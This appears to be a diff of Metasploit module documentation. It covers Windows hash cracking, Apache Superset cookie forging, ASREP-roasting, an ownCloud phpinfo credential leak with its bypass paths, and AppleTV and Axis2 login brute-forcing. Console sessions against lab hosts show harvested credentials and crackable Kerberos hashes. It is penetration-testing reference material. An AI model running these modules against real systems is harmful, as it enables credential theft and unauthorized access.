**KORELOGIC**
|
||||
### KORELOGIC
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**MEDIAWIKI**
|
||||
### MEDIAWIKI
|
||||
|
||||
Crack mediawiki hashes. Default is `true`.
|
||||
Crack mediawiki hashes. Default is `true`.
|
||||
|
||||
**MUTATE**
|
||||
### MUTATE
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
@@ -93,48 +93,48 @@
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
Default is `false`.
|
||||
|
||||
**PHPASS**
|
||||
### PHPASS
|
||||
|
||||
Crack PHPASS hashes. Default is `true`.
|
||||
Crack PHPASS hashes. Default is `true`.
|
||||
|
||||
**POT**
|
||||
### POT
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**SHOWCOMMAND**
|
||||
### SHOWCOMMAND
|
||||
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
|
||||
**USE_CREDS**
|
||||
### USE_CREDS
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
### USE_DB_INFO
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
### USE_DEFAULT_WORDLIST
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
### USE_HOSTNAMES
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
### USE_ROOT_WORDS
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
|
||||
**WORDLIST**
|
||||
### WORDLIST
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
|
||||
@@ -5,18 +5,25 @@
|
||||
|
||||
* `LANMAN` based passwords
|
||||
* `NTLM` based passwords
|
||||
* `M$ CASH hashes (1 and 2)` based passwords
|
||||
* `NETNTLM` and `NETNTLMV2` based passwords
|
||||
|
||||
| Common | John | Hashcat |
|
||||
| --------- | --------- | ------- |
|
||||
| lanman | lm | 3000 |
|
||||
| ntlm | nt | 1000 |
|
||||
| mscash | mscash | 1100 |
|
||||
| mscash2 | mscash2 | 2100 |
|
||||
| netntlm | netntlm | 5500 |
|
||||
| netntlmv2 | netntlmv2 | 5600 |
|
||||
|
||||
| Common | John | Hashcat |
|
||||
|--------|----------|---------|
|
||||
| lanman | lm | 3000 |
|
||||
| ntlm | nt | 1000 |
|
||||
|
||||
Sources of hashes can be found here:
|
||||
[source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Have at least one user with an `ntlm`, or `lanman` password hash in the database
|
||||
1. Have at least one user with an uncracked windows based password hash in the database
|
||||
2. Start msfconsole
|
||||
3. Do: ```use auxiliary/analyze/crack_windows```
|
||||
4. Do: set cracker of choice
|
||||
@@ -25,58 +32,62 @@
|
||||
|
||||
## Actions
|
||||
|
||||
**john**
|
||||
### john
|
||||
|
||||
Use john the ripper (default).
|
||||
Use john the ripper (default).
|
||||
|
||||
**hashcat**
|
||||
### hashcat
|
||||
|
||||
Use hashcat.
|
||||
Use hashcat.
|
||||
|
||||
## Options
|
||||
|
||||
**CONFIG**
|
||||
### CONFIG
|
||||
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
The path to a John config file (JtR option: `--config`). Default is `metasploit-framework/data/john.conf`
|
||||
|
||||
**CRACKER_PATH**
|
||||
### CRACKER_PATH
|
||||
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
The absolute path to the cracker executable. Default behavior is to search `path`.
|
||||
|
||||
**CUSTOM_WORDLIST**
|
||||
### CUSTOM_WORDLIST
|
||||
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
The path to an optional custom wordlist. This file is added to the new wordlist which may include the other
|
||||
`USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
|
||||
|
||||
**DeleteTempFiles**
|
||||
### DeleteTempFiles
|
||||
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
This option will prevent deletion of the wordlist and file containing hashes. This may be useful for
|
||||
running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
|
||||
|
||||
**Fork**
|
||||
### Fork
|
||||
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
This option will set how many forks to use on john the ripper. Default is `1` (no forking).
|
||||
|
||||
**INCREMENTAL**
|
||||
### INCREMENTAL
|
||||
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
Run the cracker in incremental mode. Default is `true`
|
||||
|
||||
**ITERATION_TIMEOUT**
|
||||
### ITERATION_TIMEOUT
|
||||
|
||||
The max-run-time for each iteration of cracking.
|
||||
The max-run-time for each iteration of cracking.
|
||||
|
||||
**KORELOGIC**
|
||||
### KORELOGIC
|
||||
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
|
||||
Default is `false`.
|
||||
|
||||
**LANMAN**
|
||||
### LANMAN
|
||||
|
||||
Crack LANMAN hashes. Default is `true`.
|
||||
Crack LANMAN hashes. Default is `true`.
|
||||
|
||||
**MUTATE**
|
||||
### MSCASH
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
Crack MSCASH hashes. Default is `true`.
|
||||
|
||||
### MUTATE
|
||||
|
||||
Apply common mutations to the Wordlist (SLOW). Mutations are:
|
||||
|
||||
* `'@' => 'a'`
|
||||
* `'0' => 'o'`
|
||||
@@ -86,48 +97,56 @@
|
||||
* `'1' => 'l'`
|
||||
* `'5' => 's'`
|
||||
|
||||
Default is `false`.
|
||||
Default is `false`.
|
||||
|
||||
**NTLM**
|
||||
### NETNTLM
|
||||
|
||||
Crack NTLM hashes. Default is `true`.
|
||||
Crack NETNTLM hashes. Default is `true`.
|
||||
|
||||
**POT**
|
||||
### NETNTLMV2
|
||||
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
Crack NETNTLMV2 hashes. Default is `true`.
|
||||
|
||||
**SHOWCOMMAND**
|
||||
### NTLM
|
||||
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
Crack NTLM hashes. Default is `true`.
|
||||
|
||||
**USE_CREDS**
|
||||
### POT
|
||||
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
The path to a John POT file (JtR option: `--pot`) to use instead. The `pot` file is the data file which
|
||||
records cracked password hashes. Kali linux's default location is `/root/.john/john.pot`.
|
||||
Default is `~/.msf4/john.pot`.
|
||||
|
||||
**USE_DB_INFO**
|
||||
### SHOWCOMMAND
|
||||
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
Show the command being used run from the command line for debugging. Default is `false`
|
||||
|
||||
**USE_DEFAULT_WORDLIST**
|
||||
### USE_CREDS
|
||||
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
Use existing credential data saved in the database. Default is `true`.
|
||||
|
||||
**USE_HOSTNAMES**
|
||||
### USE_DB_INFO
|
||||
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
Use looted database schema info to seed the wordlist. This includes the Database Name, each Table Name,
|
||||
and each Column Name. If the DB is MSSQL, the Instance Name is also used. Default is `true`.
|
||||
|
||||
**USE_ROOT_WORDS**
|
||||
### USE_DEFAULT_WORDLIST
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is true.
|
||||
Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`. Default is
|
||||
`true`.
|
||||
|
||||
**WORDLIST**
|
||||
### USE_HOSTNAMES
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
Seed the wordlist with hostnames from the workspace. Default is `true`.
|
||||
|
||||
### USE_ROOT_WORDS
|
||||
|
||||
Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`. Default
|
||||
is `true`.
|
||||
|
||||
### WORDLIST
|
||||
|
||||
Run the cracker in dictionary/wordlist mode. Default is `true`
|
||||
|
||||
## Scenarios
|
||||
|
||||
@@ -141,6 +160,11 @@ creds add user:lm_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb11
|
||||
creds add user:lm2_password ntlm:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
|
||||
creds add user:lm2_pot_password ntlm:e52cac67419fafe2fafe108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c jtr:lm
|
||||
creds add user:nt_password ntlm:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c jtr:nt
|
||||
creds add user:u4-netntlm hash:u4-netntlm::kNS:338d08f8e26de93300000000000000000000000000000000:9526fb8c23a90751cdd619b6cea564742e1e4bf33006ba41:cb8086049ec4736c jtr:netntlm
|
||||
creds add user:admin hash:admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030 jtr:netntlmv2
|
||||
creds add user:mscash-hashcat hash:M$test1#64cd29e36a8431a2b111378564a10631 jtr:mscash
|
||||
creds add user:mscash2-hashcat hash:$DCC2$10240#tom#e4e938d12fe5974dc42a90120bd9c90f jtr:mscash2
|
||||
|
||||
echo "" > /root/.msf4/john.pot
|
||||
echo "\$LM\$E52CAC67419FAFE2:passwor" >> /root/.msf4/john.pot
|
||||
echo "\$LM\$FAFE108F3FA6CB6D:d" >> /root/.msf4/john.pot
|
||||
|
||||
@@ -6,7 +6,7 @@ These cookies can therefore be forged. If a user is able to login to the site, t
|
||||
of an administrator, and re-sign the cookie. This valid cookie can then be used to login as the targeted user and retrieve database
|
||||
credentials saved in Apache Superset.
|
||||
|
||||
## App Install
|
||||
### App Install
|
||||
|
||||
```
|
||||
sudo docker run -p 8088:8088 --name superset apache/superset:2.0.0
|
||||
@@ -30,6 +30,7 @@ If you want any database credentials to be pulled, you'll need to configure a da
|
||||
1. Install the application
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/gather/apache_superset_priv_esc`
|
||||
1. Do: `set rhost [ip]`
|
||||
1. Do: `set username [username]`
|
||||
1. Do: `set password [password]`
|
||||
1. Do: `run`
|
||||
|
||||
+74
@@ -0,0 +1,74 @@
|
||||
## ASREP-roast
|
||||
|
||||
The `auxiliary/gather/asrep` module can be used to find users who have Pre-authentication disabled,
|
||||
and retrieve credentials that can be cracked using a hash-cracking tool.
|
||||
|
||||
The following ACTIONS are supported:
|
||||
|
||||
- **BRUTE_FORCE**: Make TGT requests for all usernames in a given file. This does not require
|
||||
valid domain credentials.
|
||||
- **LDAP**: Request the set of users with pre-authentication disabled using an LDAP query, and
|
||||
then request TGTs for these users.
|
||||
|
||||
## Module usage
|
||||
|
||||
- Start `msfconsole`
|
||||
- Do: `use auxiliary/gather/asrep`
|
||||
- Do: `run action=BRUTE_FORCE user_file=<file> rhost=<IP> domain=<FQDN> rhostname=<hostname>`
|
||||
- The module will attempt to request TGTs for each of the users in the file. This should not lock out accounts.
|
||||
A crackable value will be displayed for all identified accounts.
|
||||
- Do: `run action=LDAP rhost=<IP> username=<LDAP_User> password=<LDAP_Password> domain=<FQDN> rhostname=<hostname>`
|
||||
- The module will use LDAP to request the users without pre-auth required, and request TGTs for these users.
|
||||
A crackable value will be displayed for all identified accounts.
|
||||
|
||||
## Options
|
||||
|
||||
### DOMAIN
|
||||
The Fully Qualified Domain Name (FQDN). Ex: mydomain.local.
|
||||
|
||||
### USER_FILE
|
||||
The file containing a list of usernames, each on a new line.
|
||||
|
||||
### Rhostname
|
||||
|
||||
The hostname of the domain controller. Must be accurate otherwise the module will silently fail, even if users exist without pre-auth required.
|
||||
|
||||
### USE_RC4_HMAC
|
||||
Request a ticket with the lower-security, more easily crackable, RC4_HMAC encryption type. This is
|
||||
usually preferable, but may be less stealthy.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Brute forcing users
|
||||
|
||||
An example of brute forcing usernames, in the hope of finding one with pre-auth not required:
|
||||
|
||||
```msf
|
||||
msf6 auxiliary(gather/asrep) > run action=BRUTE_FORCE user_file=/tmp/users.txt rhost=192.168.1.1 domain=msf.local rhostname=dc22
|
||||
[*] Running module against 192.168.1.1
|
||||
|
||||
$krb5asrep$23$user@MSF.LOCAL:9fb9954fa32193185ab32e2de2ab9f13$bf14e834c661246cad302073c228e6ff7894cd3023665f0f84338432c3929922ae998c4a23bb9d163dda536a230d0503b2cf575389317b52bde782264940e80206a29e9613e47328228441cf013fb1f6672359f6799be97b962de9429e8859f437e53549be6b11ca07af6f09eae6cd78279af6d7f6dcdfd011eccb74b4aa753b2f9e6561c59c9408ee4bec983777908f3a7eef5fba977710e47e4e8ac0af10608a7dd23db506202b27d7892bc28426d2080c343edfe243bf1cae554cf6204733082332be2455e4674e1c3e84614818a6c15b54221dcaa832
|
||||
|
||||
[*] Query returned 1 result.
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
### Using LDAP
|
||||
|
||||
```
|
||||
msf6 auxiliary(gather/asrep) > run action=LDAP rhost=192.168.1.1 username=azureadmin password=password ldap::auth=kerberos domain=msf.local domaincontrollerrhost=192.168.1.1 rhostname=dc22
|
||||
[*] Running module against 192.168.1.1
|
||||
|
||||
[+] 192.168.1.1:88 - Received a valid TGT-Response
|
||||
[*] 192.168.1.1:389 - TGT MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20231124083018_default_192.168.1.1_mit.kerberos.cca_409871.bin
|
||||
[+] 192.168.1.1:88 - Received a valid TGS-Response
|
||||
[*] 192.168.1.1:389 - TGS MIT Credential Cache ticket saved to /home/smash/.msf4/loot/20231124083018_default_192.168.1.1_mit.kerberos.cca_923760.bin
|
||||
[+] 192.168.1.1:88 - Received a valid delegation TGS-Response
|
||||
[+] 192.168.1.1:389 Discovered base DN: DC=msf,DC=local
|
||||
[+] 192.168.1.1:389 Discovered schema DN: DC=msf,DC=local
|
||||
|
||||
$krb5asrep$23$user@MSF.LOCAL:234e56b15bf3a0e3eb93d662ea6ded74$9889b0a449154c1353ea4db388af29381ad367771e2fe7d6a5644180e9f7ca0b1e836fc864f6d240e9ef91124edb13797dcb097f68c537279f80e3fc3c5c86f8f937af23bb2fd58274dd40ea184994cf31de50f508faac86c61749032b2d9e4ae4c74b0f76a0c242497e6765ddfba9c57743b19d4bb97aa3ef3b66cee50a1d3871b0b4ecd3f97d42781b6fb3d8839d8805ae1291d0e9ba07d374ed84ea39fadab548c2b40c87288b4465f234d0c3341e3b27c193a62a3ad7b0bdf04dbe5bf03815d48f766d1c727838f92dd36c437782975a978aefcb33e9
|
||||
|
||||
[*] Query returned 1 result.
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,162 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Docker containers of ownCloud compiled after February 2023, which have version 0.2.0 before 0.2.1 or 0.3.0 before 0.3.1 of the app `graph` installed
|
||||
contain a test file which prints `phpinfo()` to an unauthenticated user. A post file name must be appended to the URL to bypass the login filter.
|
||||
Docker may export sensitive environment variables including ownCloud, DB, redis, SMTP, and S3 credentials, as well as other host information.
|
||||
|
||||
### Docker-Compose Build
|
||||
|
||||
Using docker-compose we can build a fairly robust system with plenty of information to pilfer.
|
||||
|
||||
Based off of [Ron Bowes Blog Post](https://www.labs.greynoise.io//grimoire/2023-11-29-owncloud-redux/)
|
||||
|
||||
A list of environment variables is posted [here](https://github.com/owncloud-docker/base/blob/master/ENVIRONMENT.md#environment-variables)
|
||||
|
||||
```
|
||||
version: "3"
|
||||
|
||||
services:
|
||||
owncloud:
|
||||
image: owncloud/server:10.12.1
|
||||
container_name: owncloud_server
|
||||
restart: always
|
||||
ports:
|
||||
- 8080:8080
|
||||
depends_on:
|
||||
- mariadb
|
||||
- redis
|
||||
environment:
|
||||
- OWNCLOUD_DOMAIN=localhost:8080
|
||||
- OWNCLOUD_TRUSTED_DOMAINS=localhost
|
||||
- OWNCLOUD_DB_TYPE=mysql
|
||||
- OWNCLOUD_DB_NAME=owncloud
|
||||
- OWNCLOUD_DB_USERNAME=owncloud
|
||||
- OWNCLOUD_DB_PASSWORD=owncloud
|
||||
- OWNCLOUD_DB_HOST=mariadb
|
||||
- OWNCLOUD_ADMIN_USERNAME=admin_username
|
||||
- OWNCLOUD_ADMIN_PASSWORD=admin_password
|
||||
- OWNCLOUD_MYSQL_UTF8MB4=true
|
||||
- OWNCLOUD_REDIS_ENABLED=true
|
||||
- OWNCLOUD_REDIS_HOST=redis
|
||||
- APACHE_LOG_LEVEL=trace6
|
||||
- OWNCLOUD_MAIL_SMTP_PASSWORD=smtp_password
|
||||
- OWNCLOUD_MAIL_SMTP_NAME=smtp_username
|
||||
- OWNCLOUD_LICENSE_KEY=1122333
|
||||
- OWNCLOUD_OBJECTSTORE_KEY=owncloud123456
|
||||
- OWNCLOUD_OBJECTSTORE_SECRET=secret123456
|
||||
- OWNCLOUD_OBJECTSTORE_REGION=us-east-1
|
||||
healthcheck:
|
||||
test: ["CMD", "/usr/bin/healthcheck"]
|
||||
interval: 30s
|
||||
timeout: 10s
|
||||
retries: 5
|
||||
|
||||
mariadb:
|
||||
image: mariadb:10.11 # minimum required ownCloud version is 10.9
|
||||
container_name: owncloud_mariadb
|
||||
restart: always
|
||||
environment:
|
||||
- MYSQL_ROOT_PASSWORD=owncloud
|
||||
- MYSQL_USER=owncloud
|
||||
- MYSQL_PASSWORD=owncloud
|
||||
- MYSQL_DATABASE=owncloud
|
||||
- MARIADB_AUTO_UPGRADE=1
|
||||
command: ["--max-allowed-packet=128M", "--innodb-log-file-size=64M"]
|
||||
healthcheck:
|
||||
test: ["CMD", "mysqladmin", "ping", "-u", "root", "--password=owncloud"]
|
||||
interval: 10s
|
||||
timeout: 5s
|
||||
retries: 5
|
||||
|
||||
redis:
|
||||
image: redis:6
|
||||
container_name: owncloud_redis
|
||||
restart: always
|
||||
command: ["--databases", "1"]
|
||||
healthcheck:
|
||||
test: ["CMD", "redis-cli", "ping"]
|
||||
interval: 10s
|
||||
timeout: 5s
|
||||
retries: 5
|
||||
```
|
||||
|
||||
You may need to add an aditional entry to `OWNCLOUD_TRUSTED_DOMAINS` which has the IP address of the host, such as `OWNCLOUD_TRUSTED_DOMAINS=localhost,192.68.1.1`
|
||||
|
||||
If the `graph` app needs to be installed, use the following instructions:
|
||||
|
||||
```
|
||||
docker exec -it owncloud_server /bin/bash
|
||||
cd apps
|
||||
wget "$(curl 'https://marketplace.owncloud.com/ajax/apps/graphapi/0.3.0' | sed 's/\\//g' | cut -d '"' -f 4)" -O graphapi-0.3.0.tar.gz
|
||||
rm -rf graphapi
|
||||
tar -zxf graphapi-0.3.0.tar.gz
|
||||
occ app:enable graphapi
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Install the application and plugin
|
||||
1. Start msfconsole
|
||||
1. Do: `use auxiliary/gather/owncloud_phpinfo_reader`
|
||||
1. Do: `set rhost [ip]`
|
||||
1. Do: `run`
|
||||
1. You should information from the system configuration
|
||||
|
||||
## Options
|
||||
|
||||
### ROOT
|
||||
|
||||
Root path of the URI, which is different than `TARGETURI` as its ownCloud specific. Defaults to `all` which will try `''` (empty), and `owncloud`
|
||||
|
||||
### ENDFILE
|
||||
|
||||
The file path to add to the end of hte URL, which is used to bypass filtering. Defaults to `all` which will try `/.css`, `/.js`, `/.svg`,
|
||||
`/.gif`, `/.png`, `/.html`, `/.ttf`, `/.woff`, `/.ico`, `/.jpg`, `/.jpeg`, `/.json`, `/.properties`, `/.min.map`, `/.js.map`, `/.auto.map`
|
||||
|
||||
## Scenarios
|
||||
|
||||
### ownCloud 10.12.1 from Docker Compose
|
||||
|
||||
```
|
||||
resource (owncloud.rb)> use auxiliary/gather/owncloud_phpinfo_reader
|
||||
resource (owncloud.rb)> set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
resource (owncloud.rb)> set verbose true
|
||||
verbose => true
|
||||
resource (owncloud.rb)> run
|
||||
[*] Running module against 127.0.0.1
|
||||
[*] Checking: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
|
||||
[+] Found phpinfo page at: /apps/graphapi/vendor/microsoft/microsoft-graph/tests/GetPhpInfo.php/.css
|
||||
[+] Loot stored to: /home/h00die/.msf4/loot/20231203153109_default_127.0.0.1_owncloud.phpinfo_453632.txt
|
||||
[+] License Key: 1122333
|
||||
[+] Hostname: b2b16d6f3ba6
|
||||
[+] Home: /root
|
||||
[+] Server Root: /var/www/owncloud
|
||||
[+] PWD: /var/www/owncloud
|
||||
[+] SMTP Username: smtp_username
|
||||
[+] SMTP Password: smtp_password
|
||||
[+] ownCloud Username: admin_username
|
||||
[+] ownCloud Password: admin_password
|
||||
[+] DB Host: mariadb:3306
|
||||
[+] DB Username: owncloud
|
||||
[+] DB Password: owncloud
|
||||
[+] DB Name: owncloud
|
||||
[+] Redis Host: redis
|
||||
[+] Redis Port: 6379
|
||||
[+] Objectstore Endpoint: https://s3.us-east-1.amazonaws.com
|
||||
[+] Objectstore Region: us-east-1
|
||||
[+] Objectsore Secret: secret123456
|
||||
[+] Objectstore Key: owncloud123456
|
||||
[+] Objectstore Bucket: owncloud
|
||||
[+] Credentials
|
||||
===========
|
||||
|
||||
Type Host Username Password Notes
|
||||
---- ---- -------- -------- -----
|
||||
S3 Object Store us-east-1 Key: owncloud123456 Secret: secret123456 Endpoint: https://s3.us-east-1.amazonaws.com, Bucket: owncloud
|
||||
SMTP 127.0.0.1:25 smtp_username smtp_password
|
||||
mysql 127.0.0.1:8080 owncloud owncloud
|
||||
ownCloud 127.0.0.1:8080 admin_username admin_password
|
||||
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
@@ -0,0 +1,110 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to authenticate to an AppleTV service with the username, 'AirPlay'.
|
||||
The device has two different access control modes: OnScreen and Password.
|
||||
The difference between the two is the password in OnScreen mode is numeric-only and four digits long,
|
||||
which means when this option is enabled, the module will make sure to cover all of them - from 0000 to 9999.
|
||||
The Password mode is more complex, therefore the usual online bruteforce strategies apply.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/http/appletv_login`
|
||||
3. Do: set the passwords via the `password` option, or pass a list of passwords via the `pass_file` option. Pass a user list via `user_list`.
|
||||
4. Do: `run`
|
||||
5. Hopefully you see something like this:
|
||||
```
|
||||
[+] 127.0.0.1:7000 - Login Successful: admin:adminpassword
|
||||
```
|
||||
|
||||
## Options
|
||||
|
||||
### BLANK_PASSWORD
|
||||
|
||||
Set to `true` if an additional login attempt should be made with an empty password for every user.
|
||||
|
||||
### BRUTEFORCE_SPEED
|
||||
|
||||
How fast to bruteforce, from 0 to 5
|
||||
|
||||
### Onscreen
|
||||
|
||||
Enable if AppleTV is using the Onscreen access control
|
||||
|
||||
### PASSWORD
|
||||
|
||||
A specific password to authenticate with
|
||||
|
||||
### PASS_FILE
|
||||
|
||||
File containing passwords, one per line
|
||||
|
||||
### STOP_ON_SUCCESS
|
||||
|
||||
Stop guessing when a credential works for a host
|
||||
|
||||
### THREADS
|
||||
|
||||
The number of concurrent threads (max one per host)
|
||||
|
||||
### USERPASS_FILE
|
||||
|
||||
File containing users and passwords separated by space, one pair per line
|
||||
|
||||
### USER_FILE
|
||||
|
||||
File containing usernames, one per line
|
||||
|
||||
### VERBOSE
|
||||
|
||||
Whether to print output for all attempts
|
||||
|
||||
### VHOST
|
||||
|
||||
HTTP server virtual host
|
||||
|
||||
## Scenarios
|
||||
```
|
||||
msf > use auxiliary/scanner/http/appletv_login
|
||||
msf6 auxiliary(scanner/http/appletv_login) > set rhosts 127.0.0.1
|
||||
rhosts => 127.0.0.1
|
||||
msf6 auxiliary(scanner/http/appletv_login) > set password N0tpassword!
|
||||
password => N0tpassword!
|
||||
msf6 auxiliary(scanner/http/appletv_login) > set userfile ./USERNAMES
|
||||
userfile => ./USERNAMES
|
||||
msf6 auxiliary(scanner/http/appletv_login) > options
|
||||
|
||||
Module options (auxiliary/scanner/http/appletv_login):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
BLANK_PASSWORDS false no Try blank passwords for all users
|
||||
BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5
|
||||
DB_ALL_PASS false no Add all passwords in the current database to the list
|
||||
Onscreen false no Enable if AppleTV is using the Onscreen access control
|
||||
PASSWORD no A specific password to authenticate with
|
||||
PASS_FILE /usr/share/metasploit-framework/data/wordlists/htt no File containing passwords, one per line
|
||||
p_default_pass.txt
|
||||
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
|
||||
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
|
||||
loit.html
|
||||
RPORT 7000 yes The target port (TCP)
|
||||
SSL false no Negotiate SSL/TLS for outgoing connections
|
||||
STOP_ON_SUCCESS true yes Stop guessing when a credential works for a host
|
||||
THREADS 1 yes The number of concurrent threads (max one per host)
|
||||
USERPASS_FILE no File containing users and passwords separated by space, one pair per line
|
||||
USER_FILE no File containing usernames, one per line
|
||||
VERBOSE true yes Whether to print output for all attempts
|
||||
VHOST no HTTP server virtual host
|
||||
|
||||
|
||||
View the full module info with the info, or info -d command.
|
||||
|
||||
msf6 auxiliary(scanner/http/appletv_login) > run
|
||||
|
||||
[*] Attempting to login to /stop using password list
|
||||
[!] 127.0.0.1:7000 - No active DB -- Credential data will not be saved!
|
||||
[-] 127.0.0.1:7000 - Failed: 'AirPlay:password'
|
||||
[+] 127.0.0.1:7000 - 127.0.0.1:7000 - Login Successful: WORKSTATION\sa:N0tpassword!
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/http/appletv_login) >
|
||||
```
|
||||
@@ -0,0 +1,131 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module attempts to login to an Apache Axis2 instance using username and password
|
||||
combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.
|
||||
It has been verified to work on at least versions 1.4.1 and 1.6.2.
|
||||
|
||||
## Verification Steps
|
||||
1. Start msfconsole
|
||||
2. Do: `use auxiliary/scanner/http/axis_login`
|
||||
3. Do: set usernames and passwords via the `username` and `password` options, or pass a list via `user_file` and `pass_file` options
|
||||
4. Do: `run`
|
||||
5. Hopefully you see somthing like this:
|
||||
```
|
||||
[+] 127.0.0.1:8080 - Login Successful: axisadmin:4x15pa$$w0rd
|
||||
```
|
||||
|
||||
## Options
|
||||
List each option and how to use it.
|
||||
|
||||
### BLANK_PASSWORDS
|
||||
|
||||
Try blank passwords for all users
|
||||
|
||||
### BLANK_PASSWORD
|
||||
|
||||
Set to `true` if an additional login attempt should be made with an empty password for every user.
|
||||
|
||||
### BRUTEFORCE_SPEED
|
||||
|
||||
How fast to bruteforce, from 0 to 5
|
||||
|
||||
### DB_ALL_CREDS
|
||||
|
||||
Try each user/password couple stored in the current database
|
||||
|
||||
### DB_ALL_PASS
|
||||
|
||||
Add all passwords in the current database to the list
